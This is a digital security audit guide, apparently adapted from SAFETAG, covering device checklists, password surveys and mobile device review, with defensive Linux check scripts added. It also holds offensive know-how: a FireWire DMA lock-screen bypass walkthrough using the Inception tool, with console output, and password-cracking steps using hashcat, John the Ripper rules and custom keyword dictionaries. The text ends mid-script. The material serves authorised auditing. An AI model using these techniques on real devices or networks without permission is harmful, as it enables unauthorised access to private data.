The auditor inspects a subset of key and/or representative user devices (work & personal). The auditor should focus on the work devices to limit scope creep, but if the office has many personal devices accessing organizational accounts/data, the auditor should share what "red flags" they are looking for and work in tandem with device owners and/or IT staff. For a small office, it may be possible to check every machine. For larger offices, the auditor should use a subset to get a feel for the overall security stance of user devices.

As you work with staff members, also interview them about the other devices they use, such as phones and tablets, and how they connect to work services - email/webmail, chat apps, intra/extranet tools, Constituent Relationship Management (CRM) tools like CiviCRM or Salesforce, financial tracking tools, and website management tools.

Below is a checklist to assist in checking across different platforms/versions for common security needs.

OSX
Windows

If Windows is not your primary OS, you can download sample Virtual Machines (with time limitations) from Microsoft through their project to improve IE support via https://www.modern.ie/en-us/virtualization-tools#downloads (see also http://www.makeuseof.com/tag/download-windows-xp-for-free-and-legally-straight-from-microsoft-si/ and https://modernievirt.blob.core.windows.net/vhd/virtualmachine_instructions_2014-01-21.pdf)

Windows 10

Windows 8

Installed updates

GUI: Control Panel -- Programs and Features -- Installed Updates. CLI: http://www.techsupportalert.com/en/quick-and-easy-way-list-all-windows-updates-installed-your-system.htm

Windows 7

In Windows 7, (GUI) Control Panel -- All Control Panel Items -- Action Center (Security tab) provides a quick run-down of most security features installed and their update status. It does not show drive encryption or specific versions.

Windows XP

If the user is still running Windows XP, the recommendation is to upgrade to a later version of Windows. Windows XP is no longer supported and does not receive security updates: https://www.microsoft.com/windows/en-us/xp/end-of-xp-support.aspx

If there is an organizationally critical system relying on Windows XP, removing it from the network and carefully managing data exchange with it may provide a bridge solution until a replacement process can be funded and rolled out.

Linux
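For the Linux column of the checklist, an added example that is not part of the SAFETAG guide: a POSIX shell script covering four of the checklist items (device encryption, firewall, pending updates, odd listening services). Each check parses the output of a standard tool (lsblk/findmnt, ufw, apt, ss) read from stdin, so it can be run both against live output on the audited machine and against the constructed sample output embedded at the bottom. The sample lines and version strings are made up for this example; the assumption that the firewall front end is ufw holds for Ubuntu-style systems only.

```sh
#!/bin/sh
# Added example (not the SAFETAG guide's own script): Linux checks for four items on
# the device checklist: drive encryption, firewall state, pending updates and
# odd/one-off services listening on the network. Each check reads a tool's output on
# stdin, so the same functions run against live output and against the constructed
# samples at the bottom (made up for this example, not captured from a real machine).

# Device encryption. Input: lsblk -rsno TYPE "$(findmnt -no SOURCE /)"
# -s walks from the root filesystem's device down to the disk, so LVM-on-LUKS layouts
# are recognised as encrypted as well as plain LUKS partitions.
root_is_encrypted() {
  grep -qx 'crypt'
}

# Firewall. Input: ufw status   (Ubuntu's front end; other firewalls need their own check)
firewall_active() {
  grep -q '^Status: active'
}

# Updates. Input: apt list --upgradable   (one "[upgradable from: ...]" line per package)
count_pending_updates() {
  grep -c 'upgradable from' || true   # grep -c exits 1 on zero matches but still prints 0
}

# Odd/one-off services. Input: ss -tlnH   (TCP listeners, numeric, no header)
# Column 4 is Local Address:Port. Sockets bound to 0.0.0.0, * or [::] are reachable from
# the LAN and are the ones to ask the device owner about; loopback-only ones are not.
exposed_tcp_ports() {
  awk '{
    n = split($4, part, ":"); port = part[n]
    host = substr($4, 1, length($4) - length(port) - 1)
    if (host == "0.0.0.0" || host == "*" || host == "[::]") print port
  }' | sort -un
}

# Run all checks on this machine; each tool is optional so the report degrades gracefully.
device_report() {
  if command -v lsblk >/dev/null 2>&1 && command -v findmnt >/dev/null 2>&1; then
    if lsblk -rsno TYPE "$(findmnt -no SOURCE /)" 2>/dev/null | root_is_encrypted; then
      echo "encryption: root filesystem is on dm-crypt"
    else
      echo "encryption: root filesystem is NOT on dm-crypt"
    fi
  fi
  if command -v ufw >/dev/null 2>&1; then
    if ufw status 2>/dev/null | firewall_active; then
      echo "firewall: ufw active"
    else
      echo "firewall: ufw inactive (or status not readable without root)"
    fi
  fi
  if command -v apt >/dev/null 2>&1; then
    echo "updates pending: $(apt list --upgradable 2>/dev/null | count_pending_updates)"
  fi
  if command -v ss >/dev/null 2>&1; then
    echo "tcp ports open to the LAN: $(ss -tlnH 2>/dev/null | exposed_tcp_ports | tr '\n' ' ')"
  fi
  echo "os: $(grep '^PRETTY_NAME=' /etc/os-release 2>/dev/null | cut -d= -f2-) (compare with the vendor's lifecycle page)"
}

# Constructed samples for exercising the parsers offline.
SAMPLE_ROOT_CHAIN='lvm
crypt
part
disk'
SAMPLE_UFW='Status: inactive'
SAMPLE_APT='Listing... Done
openssl/stable 3.0.11-1 amd64 [upgradable from: 3.0.9-1]
libc6/stable 2.36-9 amd64 [upgradable from: 2.36-8]'
SAMPLE_SS='LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:631 0.0.0.0:*
LISTEN 0 511 *:80 *:*
LISTEN 0 128 [::]:22 [::]:*'

# Invoked as "sh device_check.sh --run" on the audited machine.
if [ "${1:-}" = "--run" ]; then
  device_report
fi
```

The report only tells the auditor what to look at next: a root filesystem not on dm-crypt maps to the "Encrypt Hard Drives" recommendation, an inactive ufw to the firewall one, and any port open to the LAN that the owner cannot explain is a candidate for the odd/one-off services item.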
Recommendation

If Unsupported Operating System - Upgrade to Recent Version

Popular operating systems like Windows XP are, sadly, no longer receiving security updates. Upgrade to the latest version keeping in mind the system requirements of the version selected. For Windows, review the Windows lifecycle fact sheet for upcoming "EOLs" (End of Life). Apple does not publish EOL schedules, but historically releases security updates for their current and two prior releases.

If Pirated Software - Move to Licensed Software Systems

While "pirated" operating systems and software are extremely common (especially for Windows), they often leave much to be desired in terms of security. If the OS or software is not receiving regular updates from its creator, it is extremely vulnerable to thousands of potential attacks. Switch to licensed software or to recommended Free and Open Source Software.

If Outdated - Update Operating Systems and Other Software

Operating systems and software of all varieties - Windows, Mac, Linux, and others - are constantly being updated. These updates often fix bugs, but they also protect the system from newly discovered vulnerabilities. It can seem difficult to keep updating constantly, but this is very important to protect even non-sensitive systems.

If Vulnerable Software - Update Vulnerable Software

Many critical software components, such as Java or Adobe Flash, have many vulnerabilities and need to be aggressively updated. If they are not needed by the users for their work, uninstall them.

If No Anti-Virus and Anti-Malware Scanner - Install Anti-Virus and Anti-Malware Scanner

Anti-virus and anti-malware tools offer some minimal protection to the system, so it is important to have them installed.

If Outdated Anti-Virus - Update Anti-Virus

Most AV tools update automatically, but this can sometimes get out of sync, or, if the AV was a pre-installed trial, it will stop updating after its trial period. An out-of-date anti-virus is worthless, so ensure that the AV is continuously updated.

If Unencrypted Drive - Encrypt Hard Drives

Where available, built-in drive encryption (FileVault on OSX, BitLocker on Windows, and LUKS on Linux) tends to offer the most seamless, user-friendly experience. VeraCrypt offers free cross-platform drive encryption and can also create encrypted volumes that can be shared across platforms.

If Inactive firewall - Activate both personal and server firewall (If present)

Again, where present, use built-in firewalls and configure them for both office and public network profiles. Testing to ensure systems can still perform expected office networking (file sharing, printing, etc.) is essential unless alternatives are created.

Password Security Survey

Summary

Weak and "shared" passwords are prevalent - even after hundreds of well-publicized global password breaches, "password" and "12345" remain the most popular passwords, and password re-use is common. Weak wifi passwords are specifically a challenge, as wifi signals often are accessible outside of an office's physical limits, but provide full access to the private network.

Overview
Materials Needed
Considerations
Walkthrough

Adapt this survey to get a sense of how passwords are used in the organization. Anonymous paper surveys, later destroyed, are a good way to gather this information. The earlier questions are more important in terms of getting a sense of password practices, so consider adapting or shortening the survey based on staff/leadership buy-in and risk considerations.

How many passwords do you have to remember for accounts and devices used to do your work?

If you tried to login to your computer account right now, how many attempts do you think it would take?

Have you written down your current password?

If you wrote down your current password, how is it protected (choose all that apply) ?

Have you ever forgotten your current password?

If yes, how did you recover it?

Have you ever forgotten old work passwords?

If yes, how did you recover it?

When you created your current password, which of the following did you do?

Do you have a set of passwords you reuse in different places?

Do you have a password that you use for different accounts with a slight modification for each account?

Did you use any of the following strategies to create your current password (choose all that apply) ?

How long is your current password (total number of characters)?

What symbols (characters other than letters and numbers) are in your password?

How many lower-case letters are in your current password?

How many upper-case letters are in your current password?

In which positions in your password are the numbers?

How many symbols are in your current password?

In which positions in your password are the symbols?

Recommendation
Recommendation: Adopt Stronger Passwords

Any important password should be long enough and complex enough to resist both standard dictionary attacks and “brute-force attacks”, in which clusters of powerful computers work in parallel to test every possible character combination. (We recommend 12 or more completely random characters, or a passphrase that contains five or more relatively uncommon words.) The key should not contain common “phrases”, especially from well-known literature such as Shakespeare or religious texts, nor number sequences or phrases related to the organization, its employees or its work, and a unique password should be used for each account.

Because this becomes logistically difficult, password managers such as KeePassX or other systems are recommended.

Specifically for wireless passwords, choosing a strong WPA key is one of the most important steps toward defending an organization’s network perimeter from an adversary with the ability to spend some time in the vicinity of the offices. By extension, mitigating this vulnerability is critical to the protection of employees and partners (and confidential data) from the sort of persistent exposure that eventually brings down even the most well-secured information systems.

Because shared keys inevitably end up being written on whiteboards, given to office visitors and emailed to partners, the WPA key should also be changed periodically. This does not have to happen frequently, but anything less than three or four times per year may be unsafe.

As WPA3 becomes more widely adopted, upgrading your network to WPA3 authentication will provide substantial security against wireless password attacks.

A Day in the Life

Covered in full in User Device Assessment:

A Night in the Life

Covered in full in User Device Assessment:

Assessing Usage of Cloud Services

Covered in full in Data Assessment:

Network Mapping

Covered in full in Network Mapping

Physical Security Guided Tour

Covered in full in Physical Assessment:

Have your point of contact walk you around the office (often as part of introductions on the first day) - mentally note physical security concerns. Document how difficult it would be for a visitor or after-hours break-in to access sensitive systems. Identify physical assets with sensitive content, such as:

This can be done remotely via secure videoconference over a smartphone or tablet that can be moved around the office easily.

Combining this activity with Office Mapping helps to reduce the awkwardness of taking notes while walking around the office, and if being done remotely, the two separate activities can be used to cross-verify the accuracy of each.

User Device Assessment

Summary

This component allows the auditor to assess the security of the individual devices on the network. This component consists of interviews, surveys, and inspection of devices.

Purpose

Compromised devices have the ability to undermine nearly any other organizational attempt at securing information. Knowing if devices receive basic software and security upgrades and what core protections against unauthorized access exist is vital to designing a strategy to make the host more secure.

The Flow Of Information

User Device Assessment Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Baseline Skills

Resources

Password Security

Privilege Separation Across OS

Examining Firewalls Across OS

Identifying Software Versions

Device Encryption By OS

Anti-Virus Updates

Identifying Odd/One-Off Services

Activities

Device and Behaviour Assessment

Covered in full in Organizational Device Usage.

Mobile Device Assessment

Summary

The auditor checks the types of mobile devices used in the organization and follows a series of steps depending on the kind of device.

The key considerations with regard to mobile devices are the user, the type of device, and the data it manages:

  - whether the data is kept secure;
  - whether the device is configured with the recommended security settings;
  - the organizational policies and procedures with regard to mobile devices;
  - in the case of organization-owned devices, whether management has control over them.

These considerations contribute to the development of the report component.

Overview
Materials Needed
Considerations

NB: The auditor should not access any personal mobile device in the absence of its owner, and any step taken should be explained before it is carried out.

Walkthrough

The auditor confirms the number and nature of mobile devices that the organization owns. The auditor should keep within the agreed scope, but where multiple mobile devices outside the agreed scope access the organization's resources, redefining the scope may be necessary. The auditor should also consider the instructions under the device checklist.

As you work with staff members, also remember to interview them about the devices they use. This can alternate between mobile devices and non-mobile devices.

Below are some guiding questions to use. And this is an opportunity for the auditor to go deeper into any area concerning devices.

Guiding questions:

Recommendation

A Day in the Life

Summary

The auditor checks staff devices for updated systems and software, anti-virus and other security capabilities, and identifies software running on computers and its current version. The auditor checks for known vulnerabilities in any out-of-date software.

This is used to develop a report component showing how out-of-date software can lead to serious vulnerabilities.

Overview
Materials Needed
Considerations
Walkthrough

As you work with staff members (this pairs well with the device checklist activity), also interview them about the other devices they use, and how they connect to work services - email/webmail, intra/extranet tools, Constituent Relationship Management (CRM) tools like CiviCRM or Salesforce, financial tracking tools, and website management tools.

This can also be done remotely. Ask to have the staff member use a screensharing tool (meet.jit.si or appear.in offer easy-to-use, browser based options) so that you can watch how they interact with their computer and what applications are active in the background.

Phone Usage

User Software and Tools

Remote Services

Recommendation

Covered in full in Device and Behaviour Assessment.

A Night in the Life

Summary

The auditor interviews the staff about their practices, personal devices, software and other security capabilities that they use outside of work. The auditor checks for known vulnerabilities to any out of date software and identifies risks in the practices and behaviors.

This is used to develop a report component exposing how practices outside of their work can affect their personal security and that of the organization.

Overview
Considerations
Walkthrough

As you work with staff members (this pairs well with the device checklist activity and a day in the life), also interview them about the other devices they use, and how they connect to work or personal services - email/webmail, intra/extranet tools, Constituent Relationship Management (CRM) tools like CiviCRM or Salesforce, financial tracking tools, social media, and website management tools.

This can also be done remotely. Ask to have the staff member use a screensharing tool (meet.jit.si or appear.in offer easy-to-use, browser based options) so that you can watch how they interact with their computer and what applications are active in the background.

Phone Usage

User Software and Tools

Remote Services

Personal Practices

Recommendation

Covered in full in Device and Behaviour Assessment.

Multi Factor Authentication

When possible, enable multi-factor authentication on work accounts (email, social media, website administration, etc.), especially if the accounts are accessed from personal devices.

Firewire Access to Encrypted/Locked computers

Summary

Firewire ports and expansion slots can be abused to obtain data that are thought to be encrypted

Any attacker who obtains a running (including sleeping and hibernating!) Windows, Mac, or even Linux laptop with a Firewire port, an ExpressCard expansion slot, or a Thunderbolt port will be able to read, record or modify any sensitive information on the device, even if the screen is “locked” and the information is stored on an encrypted volume or in an encrypted folder. This applies to threats involving loss, theft and confiscation, but also to “checkpoint” scenarios in which the attacker may only have access for a few minutes.

This attack requires physical control of a machine that is not powered off. Full details of the scope of the attack are available at http://www.breaknenter.org/projects/inception/ .

Overview
Materials Needed
Considerations
Walkthrough

The threat described in this section is more complex than it needs to be. In fact, unencrypted data are vulnerable to any number of simple attacks, the two most straightforward being: 1) rebooting the computer from a USB stick, CD-ROM or DVD containing an alternate operating system, then copying all of the data; or 2) removing the hard drive, inserting it into a different machine, then copying all of the data. These techniques, which work on nearly any computer, even if a strong login password has been set, are effective and widely used, but they require extended physical access to the device. A slightly different attack is described below, one that only requires physical access for a few minutes. It, too, works regardless of login/screen-lock passwords, though only devices with Firewire ports or expansion slots (ExpressCard, CardBus, PCMCIA, etc.) are vulnerable.
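Since only devices that expose one of these buses are affected, the check an auditor would want at this point is whether a given Linux laptop does, and whether the usual mitigations are in place. The following is an added example, not part of the SAFETAG guide or of the Inception project: a POSIX shell script that inspects the loaded FireWire drivers, any modprobe blacklist, the Thunderbolt security level reported under /sys/bus/thunderbolt (the path documented in the kernel's Thunderbolt admin guide), and whether the IOMMU is active. The lsmod and modprobe.d samples embedded at the bottom are constructed for the example.

```sh
#!/bin/sh
# Added example (not from the SAFETAG guide or the Inception project): a check an
# auditor can run on a Linux laptop to see whether it exposes one of the DMA-capable
# buses described above, and whether the usual mitigations are in place. Each check
# reads its input on stdin so it can be exercised against the constructed samples
# below as well as against live output.

# FireWire driver state. Input: lsmod
# If firewire_ohci is loaded, a FireWire controller (built in or on an ExpressCard)
# is brought up by the OS, which is what the attack needs.
firewire_drivers_loaded() {
  awk '$1 == "firewire_ohci" || $1 == "firewire_core" { found = 1 } END { exit !found }'
}

# FireWire driver blacklist. Input: cat /etc/modprobe.d/*.conf
# "blacklist" stops the module from autoloading when a card is hot-plugged;
# "install <module> /bin/false" also blocks explicit loading.
firewire_blacklisted() {
  grep -Eq '^[[:space:]]*(blacklist|install)[[:space:]]+firewire[-_](ohci|core)'
}

# Thunderbolt security level. Input: cat /sys/bus/thunderbolt/devices/domain0/security
# "none" grants any connected device PCIe (and therefore DMA) access without approval;
# every other level (user, secure, dponly, usbonly, nopcie) requires approval or
# blocks PCIe tunnelling altogether.
thunderbolt_level_is_safe() {
  read -r level || level=''
  case "$level" in
    none|'') return 1 ;;
    *) return 0 ;;
  esac
}

dma_report() {
  if lsmod 2>/dev/null | firewire_drivers_loaded; then
    echo "firewire: driver loaded"
  else
    echo "firewire: driver not loaded"
  fi
  if cat /etc/modprobe.d/*.conf 2>/dev/null | firewire_blacklisted; then
    echo "firewire: blacklisted in /etc/modprobe.d"
  else
    echo "firewire: no modprobe blacklist entry found"
  fi
  tb=/sys/bus/thunderbolt/devices/domain0/security
  if [ -r "$tb" ]; then
    if thunderbolt_level_is_safe < "$tb"; then
      echo "thunderbolt: security level $(cat "$tb") (approval required)"
    else
      echo "thunderbolt: security level none (no approval required)"
    fi
  else
    echo "thunderbolt: no controller exposed (domain0 absent)"
  fi
  # IOMMU groups are populated only when DMA remapping is enabled, which limits what
  # any external device can read even while a bus is active.
  if [ -d /sys/kernel/iommu_groups ] && [ -n "$(ls -A /sys/kernel/iommu_groups 2>/dev/null)" ]; then
    echo "iommu: enabled"
  else
    echo "iommu: not enabled"
  fi
}

# Constructed samples (not captured from a real machine).
SAMPLE_LSMOD='Module                  Size  Used by
firewire_ohci          45056  0
firewire_core          81920  1 firewire_ohci
usbhid                 65536  0'
SAMPLE_MODPROBE='# constructed example of a hardening file
blacklist firewire-ohci
install firewire-core /bin/false'

# Invoked as "sh dma_check.sh --run" on the audited laptop.
if [ "${1:-}" = "--run" ]; then
  dma_report
fi
```

A laptop that reports the FireWire driver loaded with no blacklist, or a Thunderbolt level of none, is one where the point made below applies in full: screen lock and an encrypted volume do not protect data while the machine is running.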

The steps required to defend against all of these threats are the same: encrypt your data using a tool like Microsoft’s BitLocker, Apple’s FileVault or the open-source TrueCrypt application. The Firewire attack highlighted here is particularly illustrative, however, because it serves as a reminder that merely setting up an encrypted volume is not enough. In much the same way that a lock does little to protect your home if the door to which it is attached remains open, data encryption is rarely effective while you are logged into your computer. Even if the screen is locked (which would foil the “reboot” and “hard drive removal” attacks described briefly above), an attacker may still find a way to access your sensitive data while the computer is up and running, because the decryption key is present in the computer’s memory. (This is how large-scale encryption actually works. Information remains encrypted at all times on the storage device where it lives, but you are able to access it while you are logged in, or while your encrypted volume is “open,” because your computer decrypts and encrypts it on the fly.)

Walkthrough

Step 1: First, the attacker would connect her computer to the victim’s using a Firewire cable. Either or both machines could be using a true Firewire port or a Firewire expansion card. When a Firewire ExpressCard expansion card is inserted, Windows automatically installs and configures the necessary drivers, even if nobody is logged into the laptop.

Step 2: Once connected, the attacker simply runs the Inception tool, selects the operating system of the target machine and waits a minute or two for the attack to complete (depending on the amount of RAM present):

$ incept

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.2.0 (C) Carsten Maartmann-Moe 2012
Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter

[*] FireWire devices on the bus (names may appear blank):
--------------------------------------------------------------------------------
[1] Vendor (ID): MICROSOFT CORP. (0x50f2) | Product (ID):  (0x0)
--------------------------------------------------------------------------------
[*] Only one device present, device auto-selected as target
[*] Selected device: MICROSOFT CORP.
[*] Available targets:
--------------------------------------------------------------------------------
[1] Windows 8: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[2] Windows 7: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[3] Windows Vista: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[4] Windows XP: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[5] Mac OS X: DirectoryService/OpenDirectory unlock/privilege escalation
[6] Ubuntu: libpam unlock/privilege escalation
--------------------------------------------------------------------------------
[!] Please select target (or enter 'q' to quit): 2
[*] Selected target: Windows 7: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[*] Initializing bus and enabling SBP-2, please wait  1 seconds or press Ctrl+C
[*] DMA shields should be down by now. Attacking...
[*] Searching, 1328 MiB so far
[*] Signature found at 0x8b50c321 (in page # 570636)
[*] Write-back verified; patching successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!

In the case of the laptops tested, Inception took approximately two minutes to reach the final, somewhat self-congratulatory line shown above. At that point, we were able to log in using any password. (Entering “asdf” worked just fine, and gave us full access to all data on the computer.) Inception works by temporarily replacing authentication code in memory using the Firewire protocol’s direct memory access (DMA). After a reboot, everything is restored to its original state.

Once again, it is worth noting that successful mitigation of this issue requires a combination of technology (data encryption) and some level of behavior change (shutting down laptops at the end of the day, when traveling, and at any time when confiscation, theft, loss or tampering are particularly likely).

Material that may be Useful:
Recommendation

Password Security Survey

Summary

Weak and "shared" passwords are prevalent - even after hundreds of well-publicized global password breaches, "password" and "12345" remain the most popular passwords, and password re-use is common. Weak wifi passwords are a particular challenge, as wifi signals are often accessible outside of an office's physical limits, yet provide full access to the private network.

Overview
Materials Needed
Considerations
Walkthrough

Adapt this survey to get a sense of how passwords are used in the organization. Anonymous paper surveys, later destroyed, are a good way to gather this information. The earlier questions are more important in terms of getting a sense of password practices, so consider adapting or shortening the survey based on staff/leadership buy-in and risk considerations.

How many passwords do you have to remember for accounts and devices used to do your work?

If you tried to login to your computer account right now, how many attempts do you think it would take?

Have you written down your current password?

If you wrote down your current password, how is it protected (choose all that apply)?

Have you ever forgotten your current password?

If yes, how did you recover it?

Have you ever forgotten old work passwords?

If yes, how did you recover it?

When you created your current password, which of the following did you do?

Do you have a set of passwords you reuse in different places?

Do you have a password that you use for different accounts with a slight modification for each account?

Did you use any of the following strategies to create your current password (choose all that apply)?

How long is your current password (total number of characters)?

What symbols (characters other than letters and numbers) are in your password?

How many lower-case letters are in your current password?

How many upper-case letters are in your current password?

In which positions in your password are the numbers?

How many symbols are in your current password?

In which positions in your password are the symbols?

Recommendation
Recommendation: Adopt Stronger Passwords

Any important password should be long enough and complex enough to prevent both standard dictionary attacks and “brute-force attacks” in which clusters of powerful computers work in parallel to test every possible character combination. (We recommend 12 or more completely random characters or a passphrase that contains five or more relatively uncommon words.) The key should not contain common “phrases,” especially from well known literature like Shakespeare or religious texts, and should not include number sequences or phrases either, especially if they are related to the organization, its employees or its work. A unique password should be used for each account.

Because this becomes logistically difficult, password managers such as KeePassX or other systems are recommended.

Specifically for wireless passwords, choosing a strong WPA key is one of the most important steps toward defending an organization’s network perimeter from an adversary with the ability to spend some time in the vicinity of the offices. By extension, mitigating this vulnerability is critical to the protection of employees and partners (and confidential data) from the sort of persistent exposure that eventually brings down even the most well-secured information systems.

Because shared keys inevitably end up being written on whiteboards, given to office visitors and emailed to partners, the WPA key should also be changed periodically. This does not have to happen frequently, but anything less than three or four times per year may be unsafe.

As WPA3 becomes more widely adopted, upgrading your network to WPA3 authentication will provide substantial security against wireless password attacks.

Password Strength

Summary

This exercise supports the auditor in building an effective dictionary that is customized to an organization.

This dictionary can then be used in a variety of ways:

Overview
Materials Needed
Considerations
Walkthrough

This component provides resources and recommendations on cracking passwords: the creation of dictionaries, rules to mutate those dictionaries, and some basic implementation. This is a dangerous (and in many cases, illegal) skill to use. Treat it more as a guide to auditors on which password security myths do not hold up against modern password cracking software, and use it only with permission and only in very specific situations, as a demonstration of the power of even a common laptop against weak passwords.

This skillset, plus demonstration against non-invasive accounts, provides an opening for a discussion with staff on password security. See Level Up for further activities and exercises around passwords.

Primarily for use in the Network Access component, building a password dictionary, understanding the ways to automatically mutate it, and running it against passwords is a useful skill to have, and to use to explain why simple passwords are insecure. This Ars Technica article provides a good insight into the path to tackle iterative password cracking using a variety of tools to meet different goals.

These instructions use a small set of password cracking tools, but many are possible. If there are tools you are more familiar or comfortable with using, these by no means are required. The only constraints are to be respectful and responsible, as well as keeping focused on the overall goals and not getting bogged down.

A good wordlist with a few tweaks tends to break most passwords. Using a collection of all English words, all words from the language of the organization being audited, plus a combination of all these words, plus relevant keywords, addresses, and years tends to crack most wifi passwords in a reasonable timeframe.

An approach which begins with quick, but often fruitful, attacks to more and more complex (and time consuming) attacks is the most rewarding. However, after an hour or two of password hacking, the in-office time on other activities is more valuable, so admit defeat and move on. See the Recommendations section for talking points around the levels of password cracking that exist in the world. You can work on passwords offline/overnight/post-audit for report completeness.

Here is a suggested path to take with suggested tools to help. You might try the first few steps in both the targeted keyword approach and the dictionary approach before moving on to the more complex mutations towards the end of each path.

Dictionary Research and Creation

Before you arrive on-site it is important to have your password cracking tools downloaded and relevant dictionaries ready to go, as your main demonstration and use of these tools is to gain access to the organization's network. The effectiveness of this demonstration is drastically reduced if you already have had to ask for the password to connect to the Internet and update your dictionaries, tools, or so on. Some of these files (especially larger password dictionaries) can be quite large, so downloading them in-country is not recommended.

Many password dictionary sites, such as SkullSecurity, maintain core dictionaries in multiple languages. If your target language is not available, some quick regular expression work can turn spell-check dictionaries (such as those used by LibreOffice) into useful word lists. It is generally useful to always test with English in addition to the target language.

CloudCracker and OpenWall have, for a fee, well-tested password dictionaries.

Keyword generation

In addition, create a customized dictionary with words related to the subject as revealed in the Remote Assessment research: organization name, street address, phone number, email domain, wireless network name, etc. For the organization "ExampleOrg", which has its offices at 123 Central St., Federal District, Countryzstan, which does human rights and journalism work and was founded in 1992, some context-based dictionary additions would be:

exampleorg
example
exa
mple
org
123
central
federal
district
countryzstan
human
rights
journo
journalism
1992
92

Also add common password fragments: qwerty, 1234/5/6/7/8, and, based on field experience, four-digit dates back to the year 2001 (plus adding in the founding year of the organization). It's also useful to see what calendar system is in use at your organization's location as some cultures don't use Gregorian years. It's quite amazing how often a recent year will be part of a wifi password -- this presentation discusses many common patterns in passwords: https://www.owasp.org/images/a/af/2011-Supercharged-Slides-Redman-OWASP-Feb.pdf

Optional Further steps

Use CeWL to spider the organization's web properties to generate additional phrases. This list will need review, as some of the generated content is not very useful, but may be useful if the site is not in a language the auditor reads fluently.

For passwords other than WPA, specific policies or patterns may help to focus your password dictionary further. PACK, or Password Analysis and Cracking Toolkit, "is a collection of utilities developed to aid in analysis of password lists in order to enhance password cracking through pattern detection of masks, rules, character-sets and other password characteristics. The toolkit generates valid input files for Hashcat family of password crackers." PACK is most useful for large sets of passwords, where it can detect patterns in already-broken passwords to help build new rules. Both password cracking tools listed here are powerful, and have slightly different abilities. The auditor should choose the one they prefer and/or the one which has the features they desire for this job.

Build more complex password lists with scripting and Hashcat

One quick way to build a more complex password list is to simply double the list up (a "combinator" attack), so that it includes an entry for each pair of these strings:

You can do a 1-way version of this list simply, such as:

 $ while read -r foo; do while read -r bar; do printf '%s%s\n' "$foo" "$bar"; done < pwdlist.txt; done < pwdlist.txt > pwdpairs.txt
 $ cat pwdlist.txt >> pwdpairs.txt

Hashcat can do this in a live attack under its "combinator" mode, and hashcat-utils (hiding in /usr/share/hashcat-utils/combinator.bin) provides this as a standalone tool. This provides a true combination of the list, so it squares the list size (a list of n entries becomes n^2 pairs) - use with caution, or use with one larger dictionary and one smaller dictionary.

For example, use this combination approach on your custom dictionary (combining it with itself, creating combinations from the above list such as example92, journorights, exampleorgrights).

$  /usr/share/hashcat-utils/combinator.bin dict.txt dict.txt

Hashcat is extremely powerful when you have desktop computer systems to use, but has a few wordlist manipulation tools that are useful regardless.

More references: http://hashcat.net/wiki/doku.php?id=cracking_wpawpa2 and http://www.darkmoreops.com/2014/08/18/cracking-wpa2-wpa-with-hashcat-kali-linux/

Use word mutation with John the Ripper (JtR)

JtR is a powerful tool you can use in combination with existing wordlists, but it also can add in common substitutions (people using zero for the letter "o"). JtR can be used to generate a static list of passwords for other programs, or it can be used directly against a password database. JtR is a bit weak at combining words within a wordlist, so you should apply your customizations and any folding before moving on to JtR.

You can add custom "rules" to aid in these substitutions - a base set is included with JtR, but a much more powerful set is provided by KoreLogic (http://contest-2010.korelogic.com/rules.html). KoreLogic also provides a custom character set "chr file" that takes password frequency data from large collections of real-world passwords to speed up JtR's brute force mode. This PDF presentation has a good walkthrough of how John and Kore's rules work. LinuxConfig offers another good walkthrough.

The bleeding-edge jumbo version combines both the built-in rules and an optimized version of the KoreLogic rules. This list of KoreLogic Rules provides nice descriptions of what the KoreLogic rules do. In bleeding-jumbo, the "KoreLogicRules" prefix is dropped from the rule names. BackReference provides a great example of rules usage.

Some particularly useful individual rulesets are:

* AppendYears (appends years, from 1900 to 2019) and AppendCurrentYearSpecial (appends 2000-2019 with punctuation)
* AddJustNumbers (adds 1-4 digits to the end of everything)
* l33t (leet-speak combinations)

There are some built-in combinations of rulesets - for example, just --rules runs John's internal collection of default rules, --rules:KoreLogic runs a collection of the KoreLogic rules in a thoughtful order, and --rules:all is useful if you hate life.

e.g. :

  $ john -w:dictionary.txt --rules:AppendYears --stdout

Building custom rules

PROTIP: Create a dictionary with just "blah" and run various rules against it to understand how each ruleset or combination works. Note specifically that each rule multiplies the size of the dictionary by the number of permutations it introduces. Running the KoreLogic ruleset combination against a one-word dictionary creates a list of 6,327,540 permutations on just that word; piping the output through column is handy for additional visual impact.

JohnTheRipper/run/john -w=blah.txt --rules:all --stdout |column
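As an added example (not SAFETAG's own tooling), the following Python script turns the contextual keyword list, common fragments, recent-year rule, combinator pairs, l33t substitutions and digit/year suffix rules described above into a check an auditor can run against a proposed wifi key before recommending it. The keyword list mirrors the ExampleOrg illustration; the UNLEET map, the suffix pattern and the 2024 cut-off year are assumptions, and the English/target-language dictionary the text also calls for is omitted so the example runs offline.

```python
"""Would a proposed password fall to the contextual dictionary and the cheap
rule families described in this section? Added example, not SAFETAG tooling.
"""
import re

# Constructed to mirror the ExampleOrg keyword list in the text.
CONTEXT_KEYWORDS = [
    "exampleorg", "example", "exa", "mple", "org", "123", "central", "federal",
    "district", "countryzstan", "human", "rights", "journo", "journalism",
    "1992", "92",
]
# Common fragments the text says to add to every dictionary.
COMMON_FRAGMENTS = ["qwerty", "1234", "12345", "123456", "1234567", "12345678"]

# Reverse of the substitutions an l33t rule produces (assumed mapping).
UNLEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s",
                        "7": "t", "@": "a", "$": "s"})

# Suffixes a cracker bolts on cheaply: 0-4 digits (AddJustNumbers / AppendYears)
# plus a little trailing punctuation (assumed pattern).
SUFFIX_RE = re.compile(r"^\d{0,4}[!@#$.]{0,2}$")


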